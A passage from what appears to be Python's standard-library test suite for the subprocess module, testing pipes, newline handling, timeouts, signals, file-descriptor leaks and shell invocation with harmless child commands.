(stdout, stderr) = p.communicate(string_to_write)
self.assertEqual(stdout, string_to_write)
def test_writes_before_communicate(self):
# stdin.write before communicate()
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(sys.stdin.read())'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
p.stdin.write(b"banana")
(stdout, stderr) = p.communicate(b"split")
self.assertEqual(stdout, b"bananasplit")
self.assertStderrEqual(stderr, b"")
def test_universal_newlines(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;' + SETBINARY +
'buf = sys.stdout.buffer;'
'buf.write(sys.stdin.readline().encode());'
'buf.flush();'
'buf.write(b"line2\\n");'
'buf.flush();'
'buf.write(sys.stdin.read().encode());'
'buf.flush();'
'buf.write(b"line4\\n");'
'buf.flush();'
'buf.write(b"line5\\r\\n");'
'buf.flush();'
'buf.write(b"line6\\r");'
'buf.flush();'
'buf.write(b"\\nline7");'
'buf.flush();'
'buf.write(b"\\nline8");'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
universal_newlines=1)
p.stdin.write("line1\n")
p.stdin.flush()
self.assertEqual(p.stdout.readline(), "line1\n")
p.stdin.write("line3\n")
p.stdin.close()
self.addCleanup(p.stdout.close)
self.assertEqual(p.stdout.readline(),
"line2\n")
self.assertEqual(p.stdout.read(6),
"line3\n")
self.assertEqual(p.stdout.read(),
"line4\nline5\nline6\nline7\nline8")
def test_universal_newlines_communicate(self):
# universal newlines through communicate()
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;' + SETBINARY +
'buf = sys.stdout.buffer;'
'buf.write(b"line2\\n");'
'buf.flush();'
'buf.write(b"line4\\n");'
'buf.flush();'
'buf.write(b"line5\\r\\n");'
'buf.flush();'
'buf.write(b"line6\\r");'
'buf.flush();'
'buf.write(b"\\nline7");'
'buf.flush();'
'buf.write(b"\\nline8");'],
stderr=subprocess.PIPE,
stdout=subprocess.PIPE,
universal_newlines=1)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
(stdout, stderr) = p.communicate()
self.assertEqual(stdout,
"line2\nline4\nline5\nline6\nline7\nline8")
def test_universal_newlines_communicate_stdin(self):
# universal newlines through communicate(), with only stdin
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;' + SETBINARY + textwrap.dedent('''
s = sys.stdin.readline()
assert s == "line1\\n", repr(s)
s = sys.stdin.read()
assert s == "line3\\n", repr(s)
''')],
stdin=subprocess.PIPE,
universal_newlines=1)
(stdout, stderr) = p.communicate("line1\nline3\n")
self.assertEqual(p.returncode, 0)
def test_universal_newlines_communicate_input_none(self):
# Test communicate(input=None) with universal newlines.
#
# We set stdout to PIPE because, as of this writing, a different
# code path is tested when the number of pipes is zero or one.
p = subprocess.Popen([sys.executable, "-c", "pass"],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
universal_newlines=True)
p.communicate()
self.assertEqual(p.returncode, 0)
def test_universal_newlines_communicate_stdin_stdout_stderr(self):
# universal newlines through communicate(), with stdin, stdout, stderr
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;' + SETBINARY + textwrap.dedent('''
s = sys.stdin.buffer.readline()
sys.stdout.buffer.write(s)
sys.stdout.buffer.write(b"line2\\r")
sys.stderr.buffer.write(b"eline2\\n")
s = sys.stdin.buffer.read()
sys.stdout.buffer.write(s)
sys.stdout.buffer.write(b"line4\\n")
sys.stdout.buffer.write(b"line5\\r\\n")
sys.stderr.buffer.write(b"eline6\\r")
sys.stderr.buffer.write(b"eline7\\r\\nz")
''')],
stdin=subprocess.PIPE,
stderr=subprocess.PIPE,
stdout=subprocess.PIPE,
universal_newlines=True)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
(stdout, stderr) = p.communicate("line1\nline3\n")
self.assertEqual(p.returncode, 0)
self.assertEqual("line1\nline2\nline3\nline4\nline5\n", stdout)
# Python debug build push something like "[42442 refs]\n"
# to stderr at exit of subprocess.
# Don't use assertStderrEqual because it strips CR and LF from output.
self.assertTrue(stderr.startswith("eline2\neline6\neline7\n"))
def test_universal_newlines_communicate_encodings(self):
# Check that universal newlines mode works for various encodings,
# in particular for encodings in the UTF-16 and UTF-32 families.
# See issue #15595.
#
# UTF-16 and UTF-32-BE are sufficient to check both with BOM and
# without, and UTF-16 and UTF-32.
import _bootlocale
for encoding in ['utf-16', 'utf-32-be']:
old_getpreferredencoding = _bootlocale.getpreferredencoding
# Indirectly via io.TextIOWrapper, Popen() defaults to
# locale.getpreferredencoding(False) and earlier in Python 3.2 to
# locale.getpreferredencoding().
def getpreferredencoding(do_setlocale=True):
return encoding
code = ("import sys; "
r"sys.stdout.buffer.write('1\r\n2\r3\n4'.encode('%s'))" %
encoding)
args = [sys.executable, '-c', code]
try:
_bootlocale.getpreferredencoding = getpreferredencoding
# We set stdin to be non-None because, as of this writing,
# a different code path is used when the number of pipes is
# zero or one.
popen = subprocess.Popen(args, universal_newlines=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE)
stdout, stderr = popen.communicate(input='')
finally:
_bootlocale.getpreferredencoding = old_getpreferredencoding
self.assertEqual(stdout, '1\n2\n3\n4')
def test_no_leaking(self):
# Make sure we leak no resources
if not mswindows:
max_handles = 1026 # too much for most UNIX systems
else:
max_handles = 2050 # too much for (at least some) Windows setups
handles = []
tmpdir = tempfile.mkdtemp()
try:
for i in range(max_handles):
try:
tmpfile = os.path.join(tmpdir, support.TESTFN)
handles.append(os.open(tmpfile, os.O_WRONLY|os.O_CREAT))
except OSError as e:
if e.errno != errno.EMFILE:
raise
break
else:
self.skipTest("failed to reach the file descriptor limit "
"(tried %d)" % max_handles)
# Close a couple of them (should be enough for a subprocess)
for i in range(10):
os.close(handles.pop())
# Loop creating some subprocesses. If one of them leaks some fds,
# the next loop iteration will fail by reaching the max fd limit.
for i in range(15):
p = subprocess.Popen([sys.executable, "-c",
"import sys;"
"sys.stdout.write(sys.stdin.read())"],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
data = p.communicate(b"lime")[0]
self.assertEqual(data, b"lime")
finally:
for h in handles:
os.close(h)
shutil.rmtree(tmpdir)
def test_list2cmdline(self):
self.assertEqual(subprocess.list2cmdline(['a b c', 'd', 'e']),
'"a b c" d e')
self.assertEqual(subprocess.list2cmdline(['ab"c', '\\', 'd']),
'ab\\"c \\ d')
self.assertEqual(subprocess.list2cmdline(['ab"c', ' \\', 'd']),
'ab\\"c " \\\\" d')
self.assertEqual(subprocess.list2cmdline(['a\\\\\\b', 'de fg', 'h']),
'a\\\\\\b "de fg" h')
self.assertEqual(subprocess.list2cmdline(['a\\"b', 'c', 'd']),
'a\\\\\\"b c d')
self.assertEqual(subprocess.list2cmdline(['a\\\\b c', 'd', 'e']),
'"a\\\\b c" d e')
self.assertEqual(subprocess.list2cmdline(['a\\\\b\\ c', 'd', 'e']),
'"a\\\\b\\ c" d e')
self.assertEqual(subprocess.list2cmdline(['ab', '']),
'ab ""')
def test_poll(self):
p = subprocess.Popen([sys.executable, "-c",
"import os; os.read(0, 1)"],
stdin=subprocess.PIPE)
self.addCleanup(p.stdin.close)
self.assertIsNone(p.poll())
os.write(p.stdin.fileno(), b'A')
p.wait()
# Subsequent invocations should just return the returncode
self.assertEqual(p.poll(), 0)
def test_wait(self):
p = subprocess.Popen([sys.executable, "-c", "pass"])
self.assertEqual(p.wait(), 0)
# Subsequent invocations should just return the returncode
self.assertEqual(p.wait(), 0)
def test_wait_timeout(self):
p = subprocess.Popen([sys.executable,
"-c", "import time; time.sleep(0.3)"])
with self.assertRaises(subprocess.TimeoutExpired) as c:
p.wait(timeout=0.0001)
self.assertIn("0.0001", str(c.exception)) # For coverage of __str__.
# Some heavily loaded buildbots (sparc Debian 3.x) require this much
# time to start.
self.assertEqual(p.wait(timeout=3), 0)
def test_invalid_bufsize(self):
# an invalid type of the bufsize argument should raise
# TypeError.
with self.assertRaises(TypeError):
subprocess.Popen([sys.executable, "-c", "pass"], "orange")
def test_bufsize_is_none(self):
# bufsize=None should be the same as bufsize=0.
p = subprocess.Popen([sys.executable, "-c", "pass"], None)
self.assertEqual(p.wait(), 0)
# Again with keyword arg
p = subprocess.Popen([sys.executable, "-c", "pass"], bufsize=None)
self.assertEqual(p.wait(), 0)
def _test_bufsize_equal_one(self, line, expected, universal_newlines):
# subprocess may deadlock with bufsize=1, see issue #21332
with subprocess.Popen([sys.executable, "-c", "import sys;"
"sys.stdout.write(sys.stdin.readline());"
"sys.stdout.flush()"],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.DEVNULL,
bufsize=1,
universal_newlines=universal_newlines) as p:
p.stdin.write(line) # expect that it flushes the line in text mode
os.close(p.stdin.fileno()) # close it without flushing the buffer
read_line = p.stdout.readline()
try:
p.stdin.close()
except OSError:
pass
p.stdin = None
self.assertEqual(p.returncode, 0)
self.assertEqual(read_line, expected)
def test_bufsize_equal_one_text_mode(self):
# line is flushed in text mode with bufsize=1.
# we should get the full line in return
line = "line\n"
self._test_bufsize_equal_one(line, line, universal_newlines=True)
def test_bufsize_equal_one_binary_mode(self):
# line is not flushed in binary mode with bufsize=1.
# we should get empty response
line = b'line' + os.linesep.encode() # assume ascii-based locale
self._test_bufsize_equal_one(line, b'', universal_newlines=False)
def test_leaking_fds_on_error(self):
# see bug #5179: Popen leaks file descriptors to PIPEs if
# the child fails to execute; this will eventually exhaust
# the maximum number of open fds. 1024 seems a very common
# value for that limit, but Windows has 2048, so we loop
# 1024 times (each call leaked two fds).
for i in range(1024):
with self.assertRaises(OSError) as c:
subprocess.Popen(['nonexisting_i_hope'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
# ignore errors that indicate the command was not found
if c.exception.errno not in (errno.ENOENT, errno.EACCES):
raise c.exception
@unittest.skipIf(threading is None, "threading required")
def test_double_close_on_error(self):
# Issue #18851
fds = []
def open_fds():
for i in range(20):
fds.extend(os.pipe())
time.sleep(0.001)
t = threading.Thread(target=open_fds)
t.start()
try:
with self.assertRaises(EnvironmentError):
subprocess.Popen(['nonexisting_i_hope'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
finally:
t.join()
exc = None
for fd in fds:
# If a double close occurred, some of those fds will
# already have been closed by mistake, and os.close()
# here will raise.
try:
os.close(fd)
except OSError as e:
exc = e
if exc is not None:
raise exc
@unittest.skipIf(threading is None, "threading required")
def test_threadsafe_wait(self):
"""Issue21291: Popen.wait() needs to be threadsafe for returncode."""
proc = subprocess.Popen([sys.executable, '-c',
'import time; time.sleep(12)'])
self.assertEqual(proc.returncode, None)
results = []
def kill_proc_timer_thread():
results.append(('thread-start-poll-result', proc.poll()))
# terminate it from the thread and wait for the result.
proc.kill()
proc.wait()
results.append(('thread-after-kill-and-wait', proc.returncode))
# this wait should be a no-op given the above.
proc.wait()
results.append(('thread-after-second-wait', proc.returncode))
# This is a timing sensitive test, the failure mode is
# triggered when both the main thread and this thread are in
# the wait() call at once. The delay here is to allow the
# main thread to most likely be blocked in its wait() call.
t = threading.Timer(0.2, kill_proc_timer_thread)
t.start()
if mswindows:
expected_errorcode = 1
else:
# Should be -9 because of the proc.kill() from the thread.
expected_errorcode = -9
# Wait for the process to finish; the thread should kill it
# long before it finishes on its own. Supplying a timeout
# triggers a different code path for better coverage.
proc.wait(timeout=20)
self.assertEqual(proc.returncode, expected_errorcode,
msg="unexpected result in wait from main thread")
# This should be a no-op with no change in returncode.
proc.wait()
self.assertEqual(proc.returncode, expected_errorcode,
msg="unexpected result in second main wait.")
t.join()
# Ensure that all of the thread results are as expected.
# When a race condition occurs in wait(), the returncode could
# be set by the wrong thread that doesn't actually have it
# leading to an incorrect value.
self.assertEqual([('thread-start-poll-result', None),
('thread-after-kill-and-wait', expected_errorcode),
('thread-after-second-wait', expected_errorcode)],
results)
def test_issue8780(self):
# Ensure that stdout is inherited from the parent
# if stdout=PIPE is not used
code = ';'.join((
'import subprocess, sys',
'retcode = subprocess.call('
"[sys.executable, '-c', 'print(\"Hello World!\")'])",
'assert retcode == 0'))
output = subprocess.check_output([sys.executable, '-c', code])
self.assertTrue(output.startswith(b'Hello World!'), ascii(output))
def test_handles_closed_on_exception(self):
# If CreateProcess exits with an error, ensure the
# duplicate output handles are released
ifhandle, ifname = mkstemp()
ofhandle, ofname = mkstemp()
efhandle, efname = mkstemp()
try:
subprocess.Popen (["*"], stdin=ifhandle, stdout=ofhandle,
stderr=efhandle)
except OSError:
os.close(ifhandle)
os.remove(ifname)
os.close(ofhandle)
os.remove(ofname)
os.close(efhandle)
os.remove(efname)
self.assertFalse(os.path.exists(ifname))
self.assertFalse(os.path.exists(ofname))
self.assertFalse(os.path.exists(efname))
def test_communicate_epipe(self):
# Issue 10963: communicate() should hide EPIPE
p = subprocess.Popen([sys.executable, "-c", 'pass'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
p.communicate(b"x" * 2**20)
def test_communicate_epipe_only_stdin(self):
# Issue 10963: communicate() should hide EPIPE
p = subprocess.Popen([sys.executable, "-c", 'pass'],
stdin=subprocess.PIPE)
self.addCleanup(p.stdin.close)
p.wait()
p.communicate(b"x" * 2**20)
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'),
"Requires signal.SIGUSR1")
@unittest.skipUnless(hasattr(os, 'kill'),
"Requires os.kill")
@unittest.skipUnless(hasattr(os, 'getppid'),
"Requires os.getppid")
def test_communicate_eintr(self):
# Issue #12493: communicate() should handle EINTR
def handler(signum, frame):
pass
old_handler = signal.signal(signal.SIGUSR1, handler)
self.addCleanup(signal.signal, signal.SIGUSR1, old_handler)
args = [sys.executable, "-c",
'import os, signal;'
'os.kill(os.getppid(), signal.SIGUSR1)']
for stream in ('stdout', 'stderr'):
kw = {stream: subprocess.PIPE}
with subprocess.Popen(args, **kw) as process:
# communicate() will be interrupted by SIGUSR1
process.communicate()
# This test is Linux-ish specific for simplicity to at least have
# some coverage. It is not a platform specific bug.
@unittest.skipUnless(os.path.isdir('/proc/%d/fd' % os.getpid()),
"Linux specific")
def test_failed_child_execute_fd_leak(self):
"""Test for the fork() failure fd leak reported in issue16327."""
fd_directory = '/proc/%d/fd' % os.getpid()
fds_before_popen = os.listdir(fd_directory)
with self.assertRaises(PopenTestException):
PopenExecuteChildRaises(
[sys.executable, '-c', 'pass'], stdin=subprocess.PIPE,
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
# NOTE: This test doesn't verify that the real _execute_child
# does not close the file descriptors itself on the way out
# during an exception. Code inspection has confirmed that.
fds_after_exception = os.listdir(fd_directory)
self.assertEqual(fds_before_popen, fds_after_exception)
class RunFuncTestCase(BaseTestCase):
def run_python(self, code, **kwargs):
"""Run Python code in a subprocess using subprocess.run"""
argv = [sys.executable, "-c", code]
return subprocess.run(argv, **kwargs)
def test_returncode(self):
# call() function with sequence argument
cp = self.run_python("import sys; sys.exit(47)")
self.assertEqual(cp.returncode, 47)
with self.assertRaises(subprocess.CalledProcessError):
cp.check_returncode()
def test_check(self):
with self.assertRaises(subprocess.CalledProcessError) as c:
self.run_python("import sys; sys.exit(47)", check=True)
self.assertEqual(c.exception.returncode, 47)
def test_check_zero(self):
# check_returncode shouldn't raise when returncode is zero
cp = self.run_python("import sys; sys.exit(0)", check=True)
self.assertEqual(cp.returncode, 0)
def test_timeout(self):
# run() function with timeout argument; we want to test that the child
# process gets killed when the timeout expires. If the child isn't
# killed, this call will deadlock since subprocess.run waits for the
# child.
with self.assertRaises(subprocess.TimeoutExpired):
self.run_python("while True: pass", timeout=0.0001)
def test_capture_stdout(self):
# capture stdout with zero return code
cp = self.run_python("print('BDFL')", stdout=subprocess.PIPE)
self.assertIn(b'BDFL', cp.stdout)
def test_capture_stderr(self):
cp = self.run_python("import sys; sys.stderr.write('BDFL')",
stderr=subprocess.PIPE)
self.assertIn(b'BDFL', cp.stderr)
def test_check_output_stdin_arg(self):
# run() can be called with stdin set to a file
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b'pear')
tf.seek(0)
cp = self.run_python(
"import sys; sys.stdout.write(sys.stdin.read().upper())",
stdin=tf, stdout=subprocess.PIPE)
self.assertIn(b'PEAR', cp.stdout)
def test_check_output_input_arg(self):
# check_output() can be called with input set to a string
cp = self.run_python(
"import sys; sys.stdout.write(sys.stdin.read().upper())",
input=b'pear', stdout=subprocess.PIPE)
self.assertIn(b'PEAR', cp.stdout)
def test_check_output_stdin_with_input_arg(self):
# run() refuses to accept 'stdin' with 'input'
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b'pear')
tf.seek(0)
with self.assertRaises(ValueError,
msg="Expected ValueError when stdin and input args supplied.") as c:
output = self.run_python("print('will not be run')",
stdin=tf, input=b'hare')
self.assertIn('stdin', c.exception.args[0])
self.assertIn('input', c.exception.args[0])
def test_check_output_timeout(self):
with self.assertRaises(subprocess.TimeoutExpired) as c:
cp = self.run_python((
"import sys, time\n"
"sys.stdout.write('BDFL')\n"
"sys.stdout.flush()\n"
"time.sleep(3600)"),
# Some heavily loaded buildbots (sparc Debian 3.x) require
# this much time to start and print.
timeout=3, stdout=subprocess.PIPE)
self.assertEqual(c.exception.output, b'BDFL')
# output is aliased to stdout
self.assertEqual(c.exception.stdout, b'BDFL')
def test_run_kwargs(self):
newenv = os.environ.copy()
newenv["FRUIT"] = "banana"
cp = self.run_python(('import sys, os;'
'sys.exit(33 if os.getenv("FRUIT")=="banana" else 31)'),
env=newenv)
self.assertEqual(cp.returncode, 33)
@unittest.skipIf(mswindows, "POSIX specific tests")
class POSIXProcessTestCase(BaseTestCase):
def setUp(self):
super().setUp()
self._nonexistent_dir = "/_this/pa.th/does/not/exist"
def _get_chdir_exception(self):
try:
os.chdir(self._nonexistent_dir)
except OSError as e:
# This avoids hard coding the errno value or the OS perror()
# string and instead capture the exception that we want to see
# below for comparison.
desired_exception = e
desired_exception.strerror += ': ' + repr(self._nonexistent_dir)
else:
self.fail("chdir to nonexistant directory %s succeeded." %
self._nonexistent_dir)
return desired_exception
def test_exception_cwd(self):
"""Test error in the child raised in the parent for a bad cwd."""
desired_exception = self._get_chdir_exception()
try:
p = subprocess.Popen([sys.executable, "-c", ""],
cwd=self._nonexistent_dir)
except OSError as e:
# Test that the child process chdir failure actually makes
# it up to the parent process as the correct exception.
self.assertEqual(desired_exception.errno, e.errno)
self.assertEqual(desired_exception.strerror, e.strerror)
else:
self.fail("Expected OSError: %s" % desired_exception)
def test_exception_bad_executable(self):
"""Test error in the child raised in the parent for a bad executable."""
desired_exception = self._get_chdir_exception()
try:
p = subprocess.Popen([sys.executable, "-c", ""],
executable=self._nonexistent_dir)
except OSError as e:
# Test that the child process exec failure actually makes
# it up to the parent process as the correct exception.
self.assertEqual(desired_exception.errno, e.errno)
self.assertEqual(desired_exception.strerror, e.strerror)
else:
self.fail("Expected OSError: %s" % desired_exception)
def test_exception_bad_args_0(self):
"""Test error in the child raised in the parent for a bad args[0]."""
desired_exception = self._get_chdir_exception()
try:
p = subprocess.Popen([self._nonexistent_dir, "-c", ""])
except OSError as e:
# Test that the child process exec failure actually makes
# it up to the parent process as the correct exception.
self.assertEqual(desired_exception.errno, e.errno)
self.assertEqual(desired_exception.strerror, e.strerror)
else:
self.fail("Expected OSError: %s" % desired_exception)
def test_restore_signals(self):
# Code coverage for both values of restore_signals to make sure it
# at least does not blow up.
# A test for behavior would be complex. Contributions welcome.
subprocess.call([sys.executable, "-c", ""], restore_signals=True)
subprocess.call([sys.executable, "-c", ""], restore_signals=False)
def test_start_new_session(self):
# For code coverage of calling setsid(). We don't care if we get an
# EPERM error from it depending on the test execution environment, that
# still indicates that it was called.
try:
output = subprocess.check_output(
[sys.executable, "-c",
"import os; print(os.getpgid(os.getpid()))"],
start_new_session=True)
except OSError as e:
if e.errno != errno.EPERM:
raise
else:
parent_pgid = os.getpgid(os.getpid())
child_pgid = int(output)
self.assertNotEqual(parent_pgid, child_pgid)
def test_run_abort(self):
# returncode handles signal termination
with support.SuppressCrashReport():
p = subprocess.Popen([sys.executable, "-c",
'import os; os.abort()'])
p.wait()
self.assertEqual(-p.returncode, signal.SIGABRT)
def test_preexec(self):
# DISCLAIMER: Setting environment variables is *not* a good use
# of a preexec_fn. This is merely a test.
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(os.getenv("FRUIT"))'],
stdout=subprocess.PIPE,
preexec_fn=lambda: os.putenv("FRUIT", "apple"))
self.addCleanup(p.stdout.close)
self.assertEqual(p.stdout.read(), b"apple")
def test_preexec_exception(self):
def raise_it():
raise ValueError("What if two swallows carried a coconut?")
try:
p = subprocess.Popen([sys.executable, "-c", ""],
preexec_fn=raise_it)
except subprocess.SubprocessError as e:
self.assertTrue(
subprocess._posixsubprocess,
"Expected a ValueError from the preexec_fn")
except ValueError as e:
self.assertIn("coconut", e.args[0])
else:
self.fail("Exception raised by preexec_fn did not make it "
"to the parent process.")
class _TestExecuteChildPopen(subprocess.Popen):
"""Used to test behavior at the end of _execute_child."""
def __init__(self, testcase, *args, **kwargs):
self._testcase = testcase
subprocess.Popen.__init__(self, *args, **kwargs)
def _execute_child(self, *args, **kwargs):
try:
subprocess.Popen._execute_child(self, *args, **kwargs)
finally:
# Open a bunch of file descriptors and verify that
# none of them are the same as the ones the Popen
# instance is using for stdin/stdout/stderr.
devzero_fds = [os.open("/dev/zero", os.O_RDONLY)
for _ in range(8)]
try:
for fd in devzero_fds:
self._testcase.assertNotIn(
fd, (self.stdin.fileno(), self.stdout.fileno(),
self.stderr.fileno()),
msg="At least one fd was closed early.")
finally:
for fd in devzero_fds:
os.close(fd)
@unittest.skipIf(not os.path.exists("/dev/zero"), "/dev/zero required.")
def test_preexec_errpipe_does_not_double_close_pipes(self):
"""Issue16140: Don't double close pipes on preexec error."""
def raise_it():
raise subprocess.SubprocessError(
"force the _execute_child() errpipe_data path.")
with self.assertRaises(subprocess.SubprocessError):
self._TestExecuteChildPopen(
self, [sys.executable, "-c", "pass"],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, preexec_fn=raise_it)
def test_preexec_gc_module_failure(self):
# This tests the code that disables garbage collection if the child
# process will execute any Python.
def raise_runtime_error():
raise RuntimeError("this shouldn't escape")
enabled = gc.isenabled()
orig_gc_disable = gc.disable
orig_gc_isenabled = gc.isenabled
try:
gc.disable()
self.assertFalse(gc.isenabled())
subprocess.call([sys.executable, '-c', ''],
preexec_fn=lambda: None)
self.assertFalse(gc.isenabled(),
"Popen enabled gc when it shouldn't.")
gc.enable()
self.assertTrue(gc.isenabled())
subprocess.call([sys.executable, '-c', ''],
preexec_fn=lambda: None)
self.assertTrue(gc.isenabled(), "Popen left gc disabled.")
gc.disable = raise_runtime_error
self.assertRaises(RuntimeError, subprocess.Popen,
[sys.executable, '-c', ''],
preexec_fn=lambda: None)
del gc.isenabled # force an AttributeError
self.assertRaises(AttributeError, subprocess.Popen,
[sys.executable, '-c', ''],
preexec_fn=lambda: None)
finally:
gc.disable = orig_gc_disable
gc.isenabled = orig_gc_isenabled
if not enabled:
gc.disable()
def test_args_string(self):
# args is a string
fd, fname = mkstemp()
# reopen in text mode
with open(fd, "w", errors="surrogateescape") as fobj:
fobj.write("#!/bin/sh\n")
fobj.write("exec '%s' -c 'import sys; sys.exit(47)'\n" %
sys.executable)
os.chmod(fname, 0o700)
p = subprocess.Popen(fname)
p.wait()
os.remove(fname)
self.assertEqual(p.returncode, 47)
def test_invalid_args(self):
# invalid arguments should raise ValueError
self.assertRaises(ValueError, subprocess.call,
[sys.executable, "-c",
"import sys; sys.exit(47)"],
startupinfo=47)
self.assertRaises(ValueError, subprocess.call,
[sys.executable, "-c",
"import sys; sys.exit(47)"],
creationflags=47)
def test_shell_sequence(self):
# Run command through the shell (sequence)
newenv = os.environ.copy()
newenv["FRUIT"] = "apple"
p = subprocess.Popen(["echo $FRUIT"], shell=1,
stdout=subprocess.PIPE,
env=newenv)
self.addCleanup(p.stdout.close)
self.assertEqual(p.stdout.read().strip(b" \t\r\n\f"), b"apple")
def test_shell_string(self):
# Run command through the shell (string)
newenv = os.environ.copy()
newenv["FRUIT"] = "apple"
p = subprocess.Popen("echo $FRUIT", shell=1,
stdout=subprocess.PIPE,
env=newenv)
self.addCleanup(p.stdout.close)
self.assertEqual(p.stdout.read().strip(b" \t\r\n\f"), b"apple")
def test_call_string(self):
# call() function with string argument on UNIX
fd, fname = mkstemp()
# reopen in text mode
with open(fd, "w", errors="surrogateescape") as fobj:
fobj.write("#!/bin/sh\n")
fobj.write("exec '%s' -c 'import sys; sys.exit(47)'\n" %
sys.executable)
os.chmod(fname, 0o700)
rc = subprocess.call(fname)
os.remove(fname)
self.assertEqual(rc, 47)
def test_specific_shell(self):
# Issue #9265: Incorrect name passed as arg[0].
shells = []
for prefix in ['/bin', '/usr/bin/', '/usr/local/bin']:
for name in ['bash', 'ksh']:
sh = os.path.join(prefix, name)
if os.path.isfile(sh):
shells.append(sh)
if not shells: # Will probably work for any shell but csh.
self.skipTest("bash or ksh required for this test")
sh = '/bin/sh'
if os.path.isfile(sh) and not os.path.islink(sh):
# Test will fail if /bin/sh is a symlink to csh.
shells.append(sh)
for sh in shells:
p = subprocess.Popen("echo $0", executable=sh, shell=True,
stdout=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.assertEqual(p.stdout.read().strip(), bytes(sh, 'ascii'))
def _kill_process(self, method, *args):
# Do not inherit file handles from the parent.
# It should fix failures on some platforms.
# Also set the SIGINT handler to the default to make sure it's not
# being ignored (some tests rely on that.)
old_handler = signal.signal(signal.SIGINT, signal.default_int_handler)
try:
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
time.sleep(30)
"""],
close_fds=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
finally:
signal.signal(signal.SIGINT, old_handler)
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
getattr(p, method)(*args)
return p
@unittest.skipIf(sys.platform.startswith(('netbsd', 'openbsd')),
"Due to known OS bug (issue #16762)")
def _kill_dead_process(self, method, *args):
# Do not inherit file handles from the parent.
# It should fix failures on some platforms.
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
"""],
close_fds=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
# The process should end after this
time.sleep(1)
# This shouldn't raise even though the child is now dead
getattr(p, method)(*args)
p.communicate()
def test_send_signal(self):
p = self._kill_process('send_signal', signal.SIGINT)
_, stderr = p.communicate()
self.assertIn(b'KeyboardInterrupt', stderr)
self.assertNotEqual(p.wait(), 0)
def test_kill(self):
p = self._kill_process('kill')
_, stderr = p.communicate()
self.assertStderrEqual(stderr, b'')
self.assertEqual(p.wait(), -signal.SIGKILL)
def test_terminate(self):
p = self._kill_process('terminate')
_, stderr = p.communicate()
self.assertStderrEqual(stderr, b'')
self.assertEqual(p.wait(), -signal.SIGTERM)
def test_send_signal_dead(self):
# Sending a signal to a dead process
self._kill_dead_process('send_signal', signal.SIGINT)
def test_kill_dead(self):
# Killing a dead process
self._kill_dead_process('kill')
def test_terminate_dead(self):
# Terminating a dead process
self._kill_dead_process('terminate')
def _save_fds(self, save_fds):
fds = []
for fd in save_fds:
inheritable = os.get_inheritable(fd)
saved = os.dup(fd)
fds.append((fd, saved, inheritable))
return fds
def _restore_fds(self, fds):
for fd, saved, inheritable in fds:
os.dup2(saved, fd, inheritable=inheritable)
os.close(saved)
def check_close_std_fds(self, fds):
# Issue #9905: test that subprocess pipes still work properly with
# some standard fds closed
stdin = 0
saved_fds = self._save_fds(fds)
for fd, saved, inheritable in saved_fds:
if fd == 0:
stdin = saved
break
try:
for fd in fds:
os.close(fd)
out, err = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple");'
'sys.stdout.flush();'
'sys.stderr.write("orange")'],
stdin=stdin,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE).communicate()
err = support.strip_python_stderr(err)
self.assertEqual((out, err), (b'apple', b'orange'))
finally:
self._restore_fds(saved_fds)
def test_close_fd_0(self):
self.check_close_std_fds([0])
def test_close_fd_1(self):
self.check_close_std_fds([1])
def test_close_fd_2(self):
self.check_close_std_fds([2])
def test_close_fds_0_1(self):
self.check_close_std_fds([0, 1])
def test_close_fds_0_2(self):
self.check_close_std_fds([0, 2])
def test_close_fds_1_2(self):
self.check_close_std_fds([1, 2])
def test_close_fds_0_1_2(self):
# Issue #10806: test that subprocess pipes still work properly with
# all standard fds closed.
self.check_close_std_fds([0, 1, 2])
def test_small_errpipe_write_fd(self):
"""Issue #15798: Popen should work when stdio fds are available."""
new_stdin = os.dup(0)
new_stdout = os.dup(1)
try:
os.close(0)
os.close(1)
# Side test: if errpipe_write fails to have its CLOEXEC
# flag set this should cause the parent to think the exec
# failed. Extremely unlikely: everyone supports CLOEXEC.
subprocess.Popen([
sys.executable, "-c",
"print('AssertionError:0:CLOEXEC failure.')"]).wait()
finally:
# Restore original stdin and stdout
os.dup2(new_stdin, 0)
os.dup2(new_stdout, 1)
os.close(new_stdin)
os.close(new_stdout)
def test_remapping_std_fds(self):
# open up some temporary files
temps = [mkstemp() for i in range(3)]
try:
